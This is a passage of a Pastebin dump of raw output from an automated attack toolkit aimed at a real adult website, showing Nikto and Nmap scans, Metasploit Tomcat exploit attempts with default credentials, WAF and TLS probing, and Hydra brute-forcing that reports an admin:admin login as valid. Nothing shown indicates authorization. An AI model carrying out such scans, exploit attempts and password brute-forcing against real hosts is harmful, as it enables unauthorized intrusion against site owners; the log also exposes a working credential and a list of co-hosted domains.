  5591. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  5592. + All CGI directories 'found', use '-C none' to test none
  5593. + Server banner has changed from 'cloudflare' to 'cloudflare-nginx' which may suggest a WAF, load balancer or proxy is in place
  5594. + 26100 requests: 0 error(s) and 3 item(s) reported on remote host
  5595. + End Time:           2017-12-23 05:31:39 (GMT-5) (6880 seconds)
  5596. ---------------------------------------------------------------------------
  5597. + 1 host(s) tested
  5598.  
  5599. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-23 05:31 EST
  5600. Nmap scan report for nnhoney.com (104.18.37.196)
  5601. Host is up (0.12s latency).
  5602. Other addresses for nnhoney.com (not scanned): 2400:cb00:2048:1::6812:25c4 2400:cb00:2048:1::6812:24c4 104.18.36.196
  5603.  
  5604. PORT     STATE SERVICE VERSION
  5605. 8080/tcp open  http    Cloudflare nginx
  5606. |_http-server-header: cloudflare-nginx
  5607. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  5608. Device type: general purpose
  5609. Running (JUST GUESSING): Linux 3.X|2.6.X (88%)
  5610. OS CPE: cpe:/o:linux:linux_kernel:3.18 cpe:/o:linux:linux_kernel:2.6
  5611. Aggressive OS guesses: Linux 3.18 (88%), Linux 2.6.18 - 2.6.22 (86%)
  5612. No exact OS matches for host (test conditions non-ideal).
  5613. Network Distance: 9 hops
  5614.  
  5615. TRACEROUTE (using port 8080/tcp)
  5616. HOP RTT       ADDRESS
  5617. 1   108.71 ms 10.13.0.1
  5618. 2   109.45 ms 37.187.24.253
  5619. 3   108.75 ms 10.50.225.60
  5620. 4   108.93 ms 10.17.129.44
  5621. 5   108.75 ms 10.73.0.52
  5622. 6   ...
  5623. 7   115.74 ms be100-1108.ams-1-a9.nl.eu (213.186.32.211)
  5624. 8   115.76 ms ams-ix.as13335.net (80.249.211.140)
  5625. 9   115.72 ms 104.18.37.196
  5626.  
  5627. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  5628. Nmap done: 1 IP address (1 host up) scanned in 43.88 seconds
  5629. Call trans opt: received. 2-19-98 13:24:18 REC:Loc
  5630.  
  5631.      Trace program: running
  5632.  
  5633.            wake up, Neo...
  5634.         the matrix has you
  5635.       follow the white rabbit.
  5636.  
  5637.           knock, knock, Neo.
  5638.  
  5639.                         (`.         ,-,
  5640.                         ` `.    ,;' /
  5641.                          `.  ,'/ .'
  5642.                           `. X /.'
  5643.                 .-;--''--.._` ` (
  5644.               .'            /   `
  5645.              ,           ` '   Q '
  5646.              ,         ,   `._    \
  5647.           ,.|         '     `-.;_'
  5648.           :  . `  ;    `  ` --,.._;
  5649.            ' `    ,   )   .'
  5650.               `._ ,  '   /_
  5651.                  ; ,''-,;' ``-
  5652.                   ``-..__``--`
  5653.  
  5654.                              https://metasploit.com
  5655. 
  5656.  
  5657.        =[ metasploit v4.16.24-dev                         ]
  5658. + -- --=[ 1714 exploits - 973 auxiliary - 300 post        ]
  5659. + -- --=[ 503 payloads - 40 encoders - 10 nops            ]
  5660. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  5661.  
  5662. RHOST => nnhoney.com
  5663. [-] WAR file not found
  5664. [*] Auxiliary module execution completed
  5665. RHOSTS => nnhoney.com
  5666. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
  5667. RHOST => nnhoney.com
  5668. RPORT => 8080
  5669. [*] Scanned 1 of 4 hosts (25% complete)
  5670. [*] Scanned 2 of 4 hosts (50% complete)
  5671. [*] Scanned 3 of 4 hosts (75% complete)
  5672. [*] Scanned 4 of 4 hosts (100% complete)
  5673. [*] Auxiliary module execution completed
  5674. [*] Attempting to connect to 2400:cb00:2048:1::6812:24c4:8080
  5675. [+] No File(s) found
  5676. [*] Scanned 1 of 4 hosts (25% complete)
  5677. [*] Attempting to connect to 2400:cb00:2048:1::6812:25c4:8080
  5678. [+] No File(s) found
  5679. [*] Scanned 2 of 4 hosts (50% complete)
  5680. [*] Attempting to connect to 104.18.37.196:8080
  5681. [+] No File(s) found
  5682. [*] Scanned 3 of 4 hosts (75% complete)
  5683. [*] Attempting to connect to 104.18.36.196:8080
  5684. [+] No File(s) found
  5685. [*] Scanned 4 of 4 hosts (100% complete)
  5686. [*] Auxiliary module execution completed
  5687. [*] http://[2400:cb00:2048:1::6812:24c4]:8080/admin/j_security_check - Checking j_security_check...
  5688. [*] http://[2400:cb00:2048:1::6812:24c4]:8080/admin/j_security_check - Server returned: 403
  5689. [-] http://[2400:cb00:2048:1::6812:24c4]:8080/admin/j_security_check - Unable to enumerate users with this URI
  5690. [*] Scanned 1 of 4 hosts (25% complete)
  5691. [*] http://[2400:cb00:2048:1::6812:25c4]:8080/admin/j_security_check - Checking j_security_check...
  5692. [*] http://[2400:cb00:2048:1::6812:25c4]:8080/admin/j_security_check - Server returned: 403
  5693. [-] http://[2400:cb00:2048:1::6812:25c4]:8080/admin/j_security_check - Unable to enumerate users with this URI
  5694. [*] Scanned 2 of 4 hosts (50% complete)
  5695. [*] http://104.18.37.196:8080/admin/j_security_check - Checking j_security_check...
  5696. [*] http://104.18.37.196:8080/admin/j_security_check - Server returned: 403
  5697. [-] http://104.18.37.196:8080/admin/j_security_check - Unable to enumerate users with this URI
  5698. [*] Scanned 3 of 4 hosts (75% complete)
  5699. [*] http://104.18.36.196:8080/admin/j_security_check - Checking j_security_check...
  5700. [*] http://104.18.36.196:8080/admin/j_security_check - Server returned: 403
  5701. [-] http://104.18.36.196:8080/admin/j_security_check - Unable to enumerate users with this URI
  5702. [*] Scanned 4 of 4 hosts (100% complete)
  5703. [*] Auxiliary module execution completed
  5704. [-] http://2400:cb00:2048:1::6812:25c4:8080 - Authorization not requested
  5705. [*] Scanned 1 of 4 hosts (25% complete)
  5706. [-] http://2400:cb00:2048:1::6812:24c4:8080 - Authorization not requested
  5707. [*] Scanned 2 of 4 hosts (50% complete)
  5708. [-] http://104.18.36.196:8080 - Authorization not requested
  5709. [*] Scanned 3 of 4 hosts (75% complete)
  5710. [-] http://104.18.37.196:8080 - Authorization not requested
  5711. [*] Scanned 4 of 4 hosts (100% complete)
  5712. [*] Auxiliary module execution completed
  5713. [-] Exploit aborted due to failure: not-found: The target server fingerprint "cloudflare-nginx ( 403-Forbidden )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
  5714. [*] Exploit completed, but no session was created.
  5715. USERNAME => tomcat
  5716. PASSWORD => tomcat
  5717. [-] Exploit aborted due to failure: not-found: The target server fingerprint "cloudflare-nginx ( 403-Forbidden )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
  5718. [*] Exploit completed, but no session was created.
  5719.  + -- --=[Port 8180 closed... skipping.
  5720.  + -- --=[Port 8443 opened... running tests...
  5721.  
  5722.                                  ^     ^
  5723.         _   __  _   ____ _   __  _    _   ____
  5724.        ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  5725.       | V V // o // _/ | V V // 0 // 0 // _/
  5726.       |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
  5727.                                 <
  5728.                                  ...'
  5729.  
  5730.     WAFW00F - Web Application Firewall Detection Tool
  5731.  
  5732.     By Sandro Gauci && Wendel G. Henrique
  5733.  
  5734. Checking http://nnhoney.com:8443
  5735. The site http://nnhoney.com:8443 is behind a CloudFlare
  5736. Number of requests: 1
  5737.  
  5738. http://nnhoney.com:8443 [400 Bad Request] CloudFlare, Country[UNITED STATES][US], HTTPServer[cloudflare-nginx], IP[104.18.37.196], Title[400 The plain HTTP request was sent to HTTPS port], UncommonHeaders[cf-ray]
  5739.  
  5740.  
  5741.    __  ______ _____ 
  5742.    \ \/ / ___|_   _|
  5743.     \  /\___ \ | |  
  5744.     /  \ ___) || |  
  5745.    /_/\_|____/ |_|  
  5746.  
  5747. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  5748. + -- --=[Target: nnhoney.com:8443
  5749. + -- --=[Site not vulnerable to Cross-Site Tracing!
  5750. + -- --=[Site not vulnerable to Host Header Injection!
  5751. + -- --=[Site vulnerable to Cross-Frame Scripting!
  5752. + -- --=[Site vulnerable to Clickjacking!
  5753.  
  5754. HTTP/1.1 405 Not Allowed
  5755. Server: cloudflare-nginx
  5756. Date: Sat, 23 Dec 2017 10:40:34 GMT
  5757. Content-Type: text/html
  5758. Content-Length: 177
  5759. Connection: close
  5760. CF-RAY: -
  5761.  
  5762. <html>
  5763. <head><title>405 Not Allowed</title></head>
  5764. <body bgcolor="white">
  5765. <center><h1>405 Not Allowed</h1></center>
  5766. <hr><center>cloudflare-nginx</center>
  5767. </body>
  5768. </html>
  5769. 
  5770. HTTP/1.1 400 Bad Request
  5771. Server: cloudflare-nginx
  5772. Date: Sat, 23 Dec 2017 10:40:51 GMT
  5773. Content-Type: text/html
  5774. Content-Length: 275
  5775. Connection: close
  5776. CF-RAY: -
  5777.  
  5778. <html>
  5779. <head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
  5780. <body bgcolor="white">
  5781. <center><h1>400 Bad Request</h1></center>
  5782. <center>The plain HTTP request was sent to HTTPS port</center>
  5783. <hr><center>cloudflare-nginx</center>
  5784. </body>
  5785. </html>
  5786. 
  5787.  
  5788.  
  5789. Version: 1.11.10-static
  5790. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  5791. 
  5792. Testing SSL server nnhoney.com on port 8443 using SNI name nnhoney.com
  5793.  
  5794.   TLS Fallback SCSV:
  5795. Server does not support TLS Fallback SCSV
  5796.  
  5797.   TLS renegotiation:
  5798. Secure session renegotiation supported
  5799.  
  5800.   TLS Compression:
  5801. Compression disabled
  5802.  
  5803.   Heartbleed:
  5804. TLS 1.2 not vulnerable to heartbleed
  5805. TLS 1.1 not vulnerable to heartbleed
  5806. TLS 1.0 not vulnerable to heartbleed
  5807.  
  5808.   Supported Server Cipher(s):
  5809. Preferred TLSv1.2  256 bits  ECDHE-ECDSA-CHACHA20-POLY1305 Curve P-256 DHE 256
  5810. Accepted  TLSv1.2  128 bits  ECDHE-ECDSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  5811. Accepted  TLSv1.2  128 bits  ECDHE-ECDSA-AES128-SHA        Curve P-256 DHE 256
  5812. Accepted  TLSv1.2  128 bits  ECDHE-ECDSA-AES128-SHA256     Curve P-256 DHE 256
  5813. Accepted  TLSv1.2  256 bits  ECDHE-ECDSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  5814. Accepted  TLSv1.2  256 bits  ECDHE-ECDSA-AES256-SHA        Curve P-256 DHE 256
  5815. Accepted  TLSv1.2  256 bits  ECDHE-ECDSA-AES256-SHA384     Curve P-256 DHE 256
  5816. Preferred TLSv1.1  128 bits  ECDHE-ECDSA-AES128-SHA        Curve P-256 DHE 256
  5817. Accepted  TLSv1.1  256 bits  ECDHE-ECDSA-AES256-SHA        Curve P-256 DHE 256
  5818. Preferred TLSv1.0  128 bits  ECDHE-ECDSA-AES128-SHA        Curve P-256 DHE 256
  5819. Accepted  TLSv1.0  256 bits  ECDHE-ECDSA-AES256-SHA        Curve P-256 DHE 256
  5820.  
  5821.   SSL Certificate:
  5822. Signature Algorithm: ecdsa-with-SHA256
  5823. Subject:  sni171563.cloudflaressl.com
  5824. Altnames: DNS:sni171563.cloudflaressl.com, DNS:*.acreativecouple.com, DNS:*.agedbeauty.net, DNS:*.bilalmatch.co.in, DNS:*.discountefhotdshop.ga, DNS:*.echtgeschickt.faith, DNS:*.entre-coach.eu, DNS:*.femdompleasures.com, DNS:*.fncp.asia, DNS:*.fuckyeahcosplay.com, DNS:*.fuckyeahcurvygirls.com, DNS:*.fuckyeahfitgirls.com, DNS:*.getsugarinstant.com, DNS:*.icrc-era-humanbridge.eu, DNS:*.jina0mr.cf, DNS:*.jnvand.in, DNS:*.joyofincest.com, DNS:*.justsexyteengirls.com, DNS:*.lilithmedia.com, DNS:*.m7likcmidou.gq, DNS:*.nnhoney.com, DNS:*.pricegfsalehotbest.cf, DNS:*.primetush.com, DNS:*.purennmodels.com, DNS:*.servicecenterrijscholen.nl, DNS:*.survivalnation.org, DNS:*.tscraze.com, DNS:*.wooddecor.club, DNS:acreativecouple.com, DNS:agedbeauty.net, DNS:bilalmatch.co.in, DNS:discountefhotdshop.ga, DNS:echtgeschickt.faith, DNS:entre-coach.eu, DNS:femdompleasures.com, DNS:fncp.asia, DNS:fuckyeahcosplay.com, DNS:fuckyeahcurvygirls.com, DNS:fuckyeahfitgirls.com, DNS:getsugarinstant.com, DNS:icrc-era-humanbridge.eu, DNS:jina0mr.cf, DNS:jnvand.in, DNS:joyofincest.com, DNS:justsexyteengirls.com, DNS:lilithmedia.com, DNS:m7likcmidou.gq, DNS:nnhoney.com, DNS:pricegfsalehotbest.cf, DNS:primetush.com, DNS:purennmodels.com, DNS:servicecenterrijscholen.nl, DNS:survivalnation.org, DNS:tscraze.com, DNS:wooddecor.club
  5825. Issuer:   COMODO ECC Domain Validation Secure Server CA 2
  5826.  
  5827. Not valid before: Nov 18 00:00:00 2017 GMT
  5828. Not valid after:  May 27 23:59:59 2018 GMT
  5829.  
  5830.  
  5831.  
  5832.  AVAILABLE PLUGINS
  5833.  -----------------
  5834.  
  5835.   PluginOpenSSLCipherSuites
  5836.   PluginCertInfo
  5837.   PluginCompression
  5838.   PluginChromeSha1Deprecation
  5839.   PluginHSTS
  5840.   PluginSessionResumption
  5841.   PluginSessionRenegotiation
  5842.   PluginHeartbleed
  5843.  
  5844.  
  5845.  
  5846.  CHECKING HOST(S) AVAILABILITY
  5847.  -----------------------------
  5848.  
  5849.    nnhoney.com:8443                    => 2400:cb00:2048:1::6812:24c4:8443
  5850.  
  5851.  
  5852.  
  5853.  SCAN RESULTS FOR NNHONEY.COM:8443 - 2400:CB00:2048:1::6812:24C4:8443
  5854.  --------------------------------------------------------------------
  5855.  
  5856.   * Deflate Compression:
  5857.       OK - Compression disabled          
  5858.  
  5859.   * Session Renegotiation:
  5860.       Client-initiated Renegotiations:   OK - Rejected
  5861.       Secure Renegotiation:              OK - Supported
  5862.  
  5863.   * Certificate - Content:
  5864.       SHA1 Fingerprint:                  74d38f274be92e3a35f37ed9db2d7f1000db2f73
  5865.       Common Name:                       sni171563.cloudflaressl.com
  5866.       Issuer:                            COMODO ECC Domain Validation Secure Server CA 2
  5867.       Serial Number:                     6920BBFF258DEF4ABB52C8491D29F7E4
  5868.       Not Before:                        Nov 18 00:00:00 2017 GMT
  5869.       Not After:                         May 27 23:59:59 2018 GMT
  5870.       Signature Algorithm:               ecdsa-with-SHA256
  5871.       Public Key Algorithm:              id-ecPublicKey
  5872.       Key Size:                          256 bit
  5873.       X509v3 Subject Alternative Name:   {'DNS': ['sni171563.cloudflaressl.com', '*.acreativecouple.com', '*.agedbeauty.net', '*.bilalmatch.co.in', '*.discountefhotdshop.ga', '*.echtgeschickt.faith', '*.entre-coach.eu', '*.femdompleasures.com', '*.fncp.asia', '*.fuckyeahcosplay.com', '*.fuckyeahcurvygirls.com', '*.fuckyeahfitgirls.com', '*.getsugarinstant.com', '*.icrc-era-humanbridge.eu', '*.jina0mr.cf', '*.jnvand.in', '*.joyofincest.com', '*.justsexyteengirls.com', '*.lilithmedia.com', '*.m7likcmidou.gq', '*.nnhoney.com', '*.pricegfsalehotbest.cf', '*.primetush.com', '*.purennmodels.com', '*.servicecenterrijscholen.nl', '*.survivalnation.org', '*.tscraze.com', '*.wooddecor.club', 'acreativecouple.com', 'agedbeauty.net', 'bilalmatch.co.in', 'discountefhotdshop.ga', 'echtgeschickt.faith', 'entre-coach.eu', 'femdompleasures.com', 'fncp.asia', 'fuckyeahcosplay.com', 'fuckyeahcurvygirls.com', 'fuckyeahfitgirls.com', 'getsugarinstant.com', 'icrc-era-humanbridge.eu', 'jina0mr.cf', 'jnvand.in', 'joyofincest.com', 'justsexyteengirls.com', 'lilithmedia.com', 'm7likcmidou.gq', 'nnhoney.com', 'pricegfsalehotbest.cf', 'primetush.com', 'purennmodels.com', 'servicecenterrijscholen.nl', 'survivalnation.org', 'tscraze.com', 'wooddecor.club']}
  5874.  
  5875.   * Certificate - Trust:
  5876.       Hostname Validation:               OK - Subject Alternative Name matches
  5877.       Google CA Store (09/2015):         OK - Certificate is trusted
  5878.       Java 6 CA Store (Update 65):       OK - Certificate is trusted
  5879.       Microsoft CA Store (09/2015):      OK - Certificate is trusted
  5880.       Mozilla NSS CA Store (09/2015):    OK - Certificate is trusted
  5881.       Apple CA Store (OS X 10.10.5):     OK - Certificate is trusted
  5882.       Certificate Chain Received:        ['sni171563.cloudflaressl.com', 'COMODO ECC Domain Validation Secure Server CA 2', 'COMODO ECC Certification Authority']
  5883.  
  5884.   * Certificate - OCSP Stapling:
  5885.       OCSP Response Status:              successful
  5886.       Validation w/ Mozilla's CA Store:  OK - Response is trusted
  5887.       Responder Id:                      40096167F0BC83714FDE12082C6FD4D42B763D96
  5888.       Cert Status:                       good
  5889.       Cert Serial Number:                6920BBFF258DEF4ABB52C8491D29F7E4
  5890.       This Update:                       Dec 18 21:34:51 2017 GMT
  5891.       Next Update:                       Dec 25 21:34:51 2017 GMT
  5892.  
  5893.   * Session Resumption:
  5894.       With Session IDs:                  OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  5895.       With TLS Session Tickets:          OK - Supported
  5896.  
  5897.   * SSLV2 Cipher Suites:
  5898.       Server rejected all cipher suites.
  5899.  
  5900.   * SSLV3 Cipher Suites:
  5901.       Server rejected all cipher suites.
  5902.  
  5903.  
  5904.  
  5905.  SCAN COMPLETED IN 8.61 S
  5906.  ------------------------
  5907.  â–ˆâ–ˆâ–ˆâ–„ ▄███▓ ▄▄▄        â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ   ██████  â–„â–„â–„â–„    â–ˆâ–ˆâ–“    â–“█████ ▓█████ ▓█████▄ 
  5908. ▓██▒▀█▀ ██▒▒████▄    â–’██    â–’ ▒██    â–’ ▓█████▄ ▓██▒    â–“â–ˆ   ▀ ▓█   ▀ ▒██▀ ██▌
  5909. ▓██    â–“██░▒██  â–€â–ˆâ–„  â–‘ ▓██▄   ░ ▓██▄   ▒██▒ ▄██▒██░    â–’███   ▒███   ░██   █▌
  5910. ▒██    â–’██ ░██▄▄▄▄██   ▒   ██▒  â–’   ██▒▒██░█▀  â–’██░    â–’â–“â–ˆ  â–„ ▒▓█  â–„ ░▓█▄   ▌
  5911. ▒██▒   ░██▒ ▓█   ▓██▒▒██████▒▒▒██████▒▒░▓█  â–€â–ˆâ–“░██████▒░▒████▒░▒████▒░▒████▓ 
  5912. ░ ▒░   ░  â–‘ ▒▒   ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓  â–‘â–‘â–‘ ▒░ ░░░ ▒░ ░ ▒▒▓  â–’ 
  5913. ░  â–‘      â–‘  â–’   ▒▒ ░░ ░▒  â–‘ ░░ ░▒  â–‘ ░▒░▒   ░ ░ ░ ▒  â–‘ ░ ░  â–‘ ░ ░  â–‘ ░ ▒  â–’ 
  5914. ░      â–‘     ░   ▒   ░  â–‘  â–‘  â–‘  â–‘  â–‘   ░    â–‘   ░ ░      â–‘      â–‘    â–‘ ░  â–‘ 
  5915.        â–‘         ░  â–‘      â–‘        â–‘   ░          â–‘  â–‘   ░  â–‘   ░  â–‘   ░    
  5916.                                              â–‘                        â–‘      
  5917. + -- --=[MÄŚŚBĻËËĐ V20160303 BÅž 1Ņ3 @ ĊŖÖŎĐŚȞÏËĻĐ - https://crowdshield.com
  5918. + -- --=[Scan Complete!
  5919. - Nikto v2.1.6
  5920. ---------------------------------------------------------------------------
  5921. + Target IP:          104.18.36.196
  5922. + Target Hostname:    nnhoney.com
  5923. + Target Port:        8443
  5924. ---------------------------------------------------------------------------
  5925. + SSL Info:        Subject:  /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=sni171563.cloudflaressl.com
  5926.                    Ciphers:  ECDHE-ECDSA-CHACHA20-POLY1305
  5927.                    Issuer:   /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
  5928. + Start Time:         2017-12-23 05:41:34 (GMT-5)
  5929. ---------------------------------------------------------------------------
  5930. + Server: cloudflare
  5931. + Cookie __cfduid created without the secure flag
  5932. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  5933. + Uncommon header 'cf-ray' found, with contents: 3d1ab5f3a96999f8-EWR
  5934. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  5935. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  5936. + All CGI directories 'found', use '-C none' to test none
  5937. + Hostname 'nnhoney.com' does not match certificate's names: sni171563.cloudflaressl.com
  5938. + Server banner has changed from 'cloudflare' to 'cloudflare-nginx' which may suggest a WAF, load balancer or proxy is in place
  5939. + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
  5940. + Scan terminated:  20 error(s) and 7 item(s) reported on remote host
  5941. + End Time:           2017-12-23 06:24:54 (GMT-5) (2600 seconds)
  5942. ---------------------------------------------------------------------------
  5943. + 1 host(s) tested
  5944.  
  5945. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-23 06:25 EST
  5946. Nmap scan report for nnhoney.com (104.18.36.196)
  5947. Host is up (0.12s latency).
  5948. Other addresses for nnhoney.com (not scanned): 2400:cb00:2048:1::6812:25c4 2400:cb00:2048:1::6812:24c4 104.18.37.196
  5949.  
  5950. PORT     STATE SERVICE  VERSION
  5951. 8443/tcp open  ssl/http Cloudflare nginx
  5952. | http-server-header:
  5953. |   cloudflare
  5954. |_  cloudflare-nginx
  5955. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  5956. Device type: general purpose
  5957. Running (JUST GUESSING): Linux 3.X|2.6.X|4.X (88%)
  5958. OS CPE: cpe:/o:linux:linux_kernel:3.18 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:4
  5959. Aggressive OS guesses: Linux 3.18 (88%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.12 - 4.4 (85%), OpenWrt Chaos Calmer (Linux 3.18) (85%)
  5960. No exact OS matches for host (test conditions non-ideal).
  5961. Network Distance: 9 hops
  5962.  
  5963. TRACEROUTE (using port 8443/tcp)
  5964. HOP RTT       ADDRESS
  5965. 1   108.56 ms 10.13.0.1
  5966. 2   108.97 ms 37.187.24.253
  5967. 3   108.62 ms 10.50.225.61
  5968. 4   108.87 ms 10.17.129.40
  5969. 5   108.85 ms 10.73.0.52
  5970. 6   ...
  5971. 7   115.91 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
  5972. 8   116.01 ms ams-ix.as13335.net (80.249.211.140)
  5973. 9   115.88 ms 104.18.36.196
  5974.  
  5975. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  5976. Nmap done: 1 IP address (1 host up) scanned in 49.73 seconds
  5977.  + -- --=[Port 8888 closed... skipping.
  5978.  + -- --=[Port 10000 closed... skipping.
  5979.  + -- --=[Port 16992 closed... skipping.
  5980.  + -- --=[Port 27017 closed... skipping.
  5981.  + -- --=[Port 27018 closed... skipping.
  5982.  + -- --=[Port 27019 closed... skipping.
  5983.  + -- --=[Port 28017 closed... skipping.
  5984.  + -- --=[Port 49152 closed... skipping.
  5985.  + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
  5986. #########################################################################################
  5987.   oooooo   oooo       .o.        .oooooo..o ooooo     ooo   .oooooo.
  5988.    `888.   .8'       .888.      d8P'    `Y8 `888'     `8'  d8P'  `Y8b
  5989.     `888. .8'       .88888.     Y88bo.       888       8  888      888
  5990.      `888.8'       .8' `888.     `ZY8888o.   888       8  888      888
  5991.       `888'       .88ooo8888.        `0Y88b  888       8  888      888
  5992.        888       .8'     `888.  oo     .d8P  `88.    .8'  `88b    d88'
  5993.       o888o     o88o     o8888o 88888888P'     `YbodP'     `Y8bood8P'
  5994. Welcome to Yasuo v2.3
  5995. Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
  5996. #########################################################################################
  5997.  
  5998. I, [2017-12-23T06:25:53.710144 #22482]  INFO -- : Initiating port scan
  5999. I, [2017-12-23T06:26:40.287760 #22482]  INFO -- : Using nmap scan output file logs/nmap_output_2017-12-23_06-25-53.xml
  6000. I, [2017-12-23T06:26:40.289085 #22482]  INFO -- : Discovered open port: 104.18.37.196:80
  6001. I, [2017-12-23T06:26:40.759257 #22482]  INFO -- : Discovered open port: 104.18.37.196:443
  6002. I, [2017-12-23T06:26:41.228934 #22482]  INFO -- : Discovered open port: 104.18.37.196:8080
  6003. I, [2017-12-23T06:26:41.695413 #22482]  INFO -- : Discovered open port: 104.18.37.196:8443
  6004. W, [2017-12-23T06:26:42.160233 #22482]  WARN -- : Yasuo did not find any potential hosts to enumerate
  6005.  + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +
  6006.  + -- ----------------------------=[Running Brute Force]=--------------------- -- +
  6007.  __________                __         ____  ___
  6008.  \______   \_______ __ ___/  |_  ____ \   \/  /
  6009.   |    |  _/\_  __ \  |  \   __\/ __ \ \     / 
  6010.   |    |   \ |  | \/  |  /|  | \  ___/ /     \ 
  6011.   |______  / |__|  |____/ |__|  \___  >___/\  \ 
  6012.          \/                         \/      \_/
  6013.  
  6014.  + -- --=[BruteX v1.7 by 1N3
  6015.  + -- --=[http://crowdshield.com
  6016.  
  6017.  
  6018. ################################### Running Port Scan ##############################
  6019.  
  6020. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-23 06:26 EST
  6021. Nmap scan report for nnhoney.com (104.18.36.196)
  6022. Host is up (0.12s latency).
  6023. Other addresses for nnhoney.com (not scanned): 2400:cb00:2048:1::6812:25c4 2400:cb00:2048:1::6812:24c4 104.18.37.196
  6024. Not shown: 23 filtered ports
  6025. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  6026. PORT     STATE SERVICE
  6027. 80/tcp   open  http
  6028. 443/tcp  open  https
  6029. 8080/tcp open  http-proxy
  6030.  
  6031. Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds
  6032.  
  6033. ################################### Running Brute Force ############################
  6034.  
  6035.  + -- --=[Port 21 closed... skipping.
  6036.  + -- --=[Port 22 closed... skipping.
  6037.  + -- --=[Port 23 closed... skipping.
  6038.  + -- --=[Port 25 closed... skipping.
  6039.  + -- --=[Port 80 opened... running tests...
  6040. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  6041.  
  6042. Hydra (http://www.thc.org/thc-hydra) starting at 2017-12-23 06:26:58
  6043. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  6044. [DATA] attacking http-get://nnhoney.com:80//
  6045. [80][http-get] host: nnhoney.com   login: admin   password: admin
  6046. [STATUS] attack finished for nnhoney.com (valid pair found)
  6047. 1 of 1 target successfully completed, 1 valid password found
  6048. Hydra (http://www.thc.org/thc-hydra) finished at 2017-12-23 06:27:07
  6049.  + -- --=[Port 110 closed... skipping.
  6050.  + -- --=[Port 139 closed... skipping.
  6051.  + -- --=[Port 162 closed... skipping.
  6052.  + -- --=[Port 389 closed... skipping.
  6053.  + -- --=[Port 443 opened... running tests...
  6054. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  6055.  
  6056. Hydra (http://www.thc.org/thc-hydra) starting at 2017-12-23 06:27:07
  6057. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  6058. [DATA] attacking http-gets://nnhoney.com:443//
  6059. [443][http-get] host: nnhoney.com   login: admin   password: admin
  6060. [STATUS] attack finished for nnhoney.com (valid pair found)
  6061. 1 of 1 target successfully completed, 1 valid password found
  6062. Hydra (http://www.thc.org/thc-hydra) finished at 2017-12-23 06:27:17
  6063.  + -- --=[Port 445 closed... skipping.
  6064.  + -- --=[Port 512 closed... skipping.
  6065.  + -- --=[Port 513 closed... skipping.
  6066.  + -- --=[Port 514 closed... skipping.
  6067.  + -- --=[Port 993 closed... skipping.
  6068.  + -- --=[Port 1433 closed... skipping.
  6069.  + -- --=[Port 1521 closed... skipping.
  6070.  + -- --=[Port 3306 closed... skipping.
  6071.  + -- --=[Port 3389 closed... skipping.
  6072.  + -- --=[Port 5432 closed... skipping.
  6073.  + -- --=[Port 5900 closed... skipping.
  6074.  + -- --=[Port 5901 closed... skipping.
  6075.  + -- --=[Port 8000 closed... skipping.
  6076.  + -- --=[Port 8080 opened... running tests...
  6077. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  6078.  
  6079. Hydra (http://www.thc.org/thc-hydra) starting at 2017-12-23 06:27:17
  6080.  + -- --=[Port 8100 closed... skipping.
  6081.  + -- --=[Port 6667 closed... skipping.
  6082.  
  6083. ################################### Done! ###########################################
  6084. ######################################################################################################################################
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top